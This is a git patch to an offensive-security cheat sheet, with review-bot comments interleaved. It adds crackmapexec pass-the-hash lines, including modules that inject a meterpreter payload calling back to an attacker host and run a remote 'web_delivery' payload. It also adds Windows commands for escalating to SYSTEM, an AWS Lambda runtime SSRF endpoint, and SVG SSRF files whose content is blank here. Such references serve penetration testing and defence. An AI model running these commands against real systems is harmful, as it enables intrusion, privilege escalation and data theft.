From b6697d859570803e55cff6a68d4d6827b2126788 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Thu, 15 Aug 2019 18:21:06 +0200 Subject: [PATCH] SSRF SVG + Windows Token getsystem --- .../Active Directory Attack.md | 8 +++++--- .../Windows - Privilege Escalation.md | 11 +++++++++++ .../Files/ssrf_svg_css_import.svg | 7 +++++++ .../Files/ssrf_svg_css_link.svg | 6 ++++++ .../Files/ssrf_svg_css_xmlstylesheet.svg | 6 ++++++ .../Files/ssrf_svg_image.svg | 4 ++++ .../Files/ssrf_svg_use.svg | 4 ++++ Server Side Request Forgery/README.md | 15 ++++++++++++++- 8 files changed, 57 insertions(+), 4 deletions(-) create mode 100644 Server Side Request Forgery/Files/ssrf_svg_css_import.svg create mode 100644 Server Side Request Forgery/Files/ssrf_svg_css_link.svg create mode 100644 Server Side Request Forgery/Files/ssrf_svg_css_xmlstylesheet.svg create mode 100644 Server Side Request Forgery/Files/ssrf_svg_image.svg create mode 100644 Server Side Request Forgery/Files/ssrf_svg_use.svg diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 6dae309..7a1cfc6 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -55,6 +55,7 @@ crackmapexec smb -M name_module -o VAR=DATA crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f --local-auth crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f --shares + crackmapexec 192.168.1.100 -u Jaddmon -H ':5858d47a41e40b40f294b3100bea611f' -d 'DOMAIN' -M invoke_sessiongopher crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M metinject -o LHOST=192.168.1.63 LPORT=4443 crackmapexec 192.168.1.100 -u Jaddmon -H ":5858d47a41e40b40f294b3100bea611f" -M web_delivery -o URL="https://IP:PORT/posh-payload" 
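Review bot: The added `invoke_sessiongopher` line passes the hash as `':5858d47a41e40b40f294b3100bea611f'` (LM:NT form with the LM half left empty) while the three crackmapexec lines around it pass the bare NT hash `5858d47a41e40b40f294b3100bea611f`; only the `web_delivery` line at the end of the block uses the same colon-prefixed form. As far as I know crackmapexec's `-H` accepts both spellings, so this is a readability point rather than a bug, but in a cheat-sheet block that gets copied line by line the two forms read as two different values. Writing the new line as `crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -d 'DOMAIN' -M invoke_sessiongopher` would keep the block uniform.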
@@ -170,13 +171,13 @@ mimikatz.exe "kerberos::ptc c:\temp\TGT_darthsidious@lab.adsecurity.org.ccache" :warning: If the clock is skewed use `clock-skew.nse` script from `nmap` ```powershell -$ nmap -sV -sC 10.10.10.10 +Linux> $ nmap -sV -sC 10.10.10.10 clock-skew: mean: -1998d09h03m04s, deviation: 4h00m00s, median: -1998d11h03m05s -$ sudo date -s "14 APR 2015 18:25:16" +Linux> sudo date -s "14 APR 2015 18:25:16" +Windows> net time /domain /set ``` - ### Open Shares ```powershell @@ -230,6 +231,7 @@ Mount a share ```powershell smbmount //X.X.X.X/c$ /mnt/remote/ -o username=user,password=pass,rw +sudo mount -t cifs -o username=,password= ///Users folder ``` ### GPO - Pivoting with Local Admin & Passwords in SYSVOL diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index 357f3c1..12f24dc 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -18,6 +18,7 @@ * [EoP - From local administrator to NT SYSTEM](#eop---from-local-administrator-to-nt-system) * [EoP - Living Off The Land Binaries and Scripts](#eop---living-off-the-land-binaries-and-scripts) * [EoP - Impersonation Privileges](#eop---impersonation-privileges) + * [Meterpreter getsystem and alternatives](#meterpreter-getsystem-and-alternatives) * [RottenPotato (Token Impersonation)](#rottenpotato-token-impersonation) * [Juicy Potato (abusing the golden privileges)](#juicy-potato-abusing-the-golden-privileges) * [EoP - Common Vulnerabilities and Exposures](#eop---common-vulnerabilities-and-exposure) 
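Review bot: In the @@ -170 hunk the rewritten line `Linux> $ nmap -sV -sC 10.10.10.10` keeps the old `$ ` prompt under the new `Linux>` prefix, while the sibling `Linux> sudo date -s "14 APR 2015 18:25:16"` and `Windows> net time /domain /set` lines carry the prefix alone; dropping the `$ ` makes the three lines consistent. The `clock-skew: mean: ...` line between them is nmap output rather than a command and is now the only unprefixed line in the block, so marking it as output (for example with a leading `#`) would stop it being copied as a command. As far as the commands themselves go, both `date -s` and `net time /domain /set` adjust the clock of the machine they run on to match the domain, which the `:warning:` line could state explicitly so the reader does not expect the target's time to change.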
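Review bot: The line added in the @@ -230 hunk, `sudo mount -t cifs -o username=,password= ///Users folder`, is not a usable template: `///Users` has no host component, both credential options are empty, and the mount point `folder` differs from the `/mnt/remote/` the smbmount line directly above it uses. Rewriting it in the same shape as that line, `sudo mount -t cifs -o username=user,password=pass //X.X.X.X/Users /mnt/remote/`, keeps the two examples parallel and makes the placeholders obvious. Since a password given in `-o` ends up in shell history and `ps` output, the page could also mention mount.cifs's `credentials=<file>` option as the quieter form.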
@@ -662,6 +663,16 @@ Microsoft.Workflow.Compiler.exe tests.xml results.xml ## EoP - Impersonation Privileges +### Meterpreter getsystem and alternatives + +```powershell +meterpreter> getsystem +Tokenvator.exe getsystem cmd.exe +incognito.exe execute -c "NT AUTHORITY\SYSTEM" cmd.exe +psexec -s -i cmd.exe +python getsystem.py # from https://github.com/sailay1996/tokenx_privEsc +``` + ### RottenPotato (Token Impersonation) Binary available at : https://github.com/foxglovesec/RottenPotato diff --git a/Server Side Request Forgery/Files/ssrf_svg_css_import.svg b/Server Side Request Forgery/Files/ssrf_svg_css_import.svg new file mode 100644 index 0000000..8c1f446 --- /dev/null +++ b/Server Side Request Forgery/Files/ssrf_svg_css_import.svg @@ -0,0 +1,7 @@ + + + + \ No newline at end of file diff --git a/Server Side Request Forgery/Files/ssrf_svg_css_link.svg b/Server Side Request Forgery/Files/ssrf_svg_css_link.svg new file mode 100644 index 0000000..e9f7d30 --- /dev/null +++ b/Server Side Request Forgery/Files/ssrf_svg_css_link.svg @@ -0,0 +1,6 @@ + + + + \ No newline at end of file diff --git a/Server Side Request Forgery/Files/ssrf_svg_css_xmlstylesheet.svg b/Server Side Request Forgery/Files/ssrf_svg_css_xmlstylesheet.svg new file mode 100644 index 0000000..a29199a --- /dev/null +++ b/Server Side Request Forgery/Files/ssrf_svg_css_xmlstylesheet.svg @@ -0,0 +1,6 @@ + + + + \ No newline at end of file diff --git a/Server Side Request Forgery/Files/ssrf_svg_image.svg b/Server Side Request Forgery/Files/ssrf_svg_image.svg new file mode 100644 index 0000000..9d3b717 --- /dev/null +++ b/Server Side Request Forgery/Files/ssrf_svg_image.svg @@ -0,0 +1,4 @@ + + + \ No newline at end of file diff --git a/Server Side Request Forgery/Files/ssrf_svg_use.svg b/Server Side Request Forgery/Files/ssrf_svg_use.svg new file mode 100644 index 0000000..14040b2 --- /dev/null +++ b/Server Side Request Forgery/Files/ssrf_svg_use.svg @@ -0,0 +1,4 @@ + + + \ No newline at end of file 
diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md
index 9a7032a..1f0368a 100644
--- a/Server Side Request Forgery/README.md
+++ b/Server Side Request Forgery/README.md
@@ -32,6 +32,7 @@
 * [SSRF URL for Cloud Instances](#ssrf-url-for-cloud-instances)
 * [SSRF URL for AWS Bucket](#ssrf-url-for-aws-bucket)
 * [SSRF URL for AWS Elastic Beanstalk](#ssrf-url-for-aws-elastic-beanstalk)
+ * [SSRF URL for AWS Lambda](#ssrf-url-for-aws-lambda)
 * [SSRF URL for Google Cloud](#ssrf-url-for-google-cloud)
 * [SSRF URL for Digital Ocean](#ssrf-url-for-digital-ocean)
 * [SSRF URL for Packetcloud](#ssrf-url-for-packetcloud)
@@ -441,6 +442,17 @@ http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-elasticbean
 Then we use the credentials with `aws s3 ls s3://elasticbeanstalk-us-east-2-[ACCOUNT_ID]/`.
+### SSRF URL for AWS Lambda
+
+AWS Lambda provides an HTTP API for custom runtimes to receive invocation events from Lambda and send response data back within the Lambda execution environment.
+
+```powershell
+http://localhost:9001/2018-06-01/runtime/invocation/next
+$ curl "http://${AWS_LAMBDA_RUNTIME_API}/2018-06-01/runtime/invocation/next"
+```
+
+Docs: https://docs.aws.amazon.com/lambda/latest/dg/runtimes-api.html#runtimes-api-next
+
 ### SSRF URL for Google Cloud
 Requires the header "Metadata-Flavor: Google" or "X-Google-Metadata-Request: True"
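Review bot: The new `SSRF URL for AWS Lambda` section in the @@ -441 hunk never states what `/2018-06-01/runtime/invocation/next` returns or from where it is reachable, whereas the Elastic Beanstalk entry just above says what its metadata URL yields and what to do with the result. From the linked Runtime API docs and the `${AWS_LAMBDA_RUNTIME_API}` variable already used on the curl line, the endpoint is served inside the function's own execution environment and a GET on it hands back the next pending invocation event, i.e. the request payload the function itself was about to process; presumably that event is then never delivered to the real runtime, which is the operational symptom a defender would look for. A one-line note after the intro paragraph such as `Only reachable from inside the Lambda execution environment (address in $AWS_LAMBDA_RUNTIME_API); a GET on /next returns the next pending invocation event.` would make the entry self-contained.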
@@ -631,4 +643,5 @@ More info: https://rancher.com/docs/rancher/v1.6/en/rancher-services/metadata-se
 - [SSRF Protocol Smuggling in Plaintext Credential Handlers : LDAP - @0xrst](https://www.silentrobots.com/blog/2019/02/06/ssrf-protocol-smuggling-in-plaintext-credential-handlers-ldap/)
 - [X-CTF Finals 2016 - John Slick (Web 25) - YEO QUAN YANG @quanyang](https://quanyang.github.io/x-ctf-finals-2016-john-slick-web-25/)
 - [Exploiting SSRF in AWS Elastic Beanstalk - February 1, 2019 - @notsosecure](https://www.notsosecure.com/exploiting-ssrf-in-aws-elastic-beanstalk/)
-- [PortSwigger - Web Security Academy Server-side request forgery (SSRF)](https://portswigger.net/web-security/ssrf)
\ No newline at end of file
+- [PortSwigger - Web Security Academy Server-side request forgery (SSRF)](https://portswigger.net/web-security/ssrf)
+- [SVG SSRF Cheatsheet - Allan Wirth (@allanlw) - 12/06/2019](https://github.com/allanlw/svg-cheatsheet)
\ No newline at end of file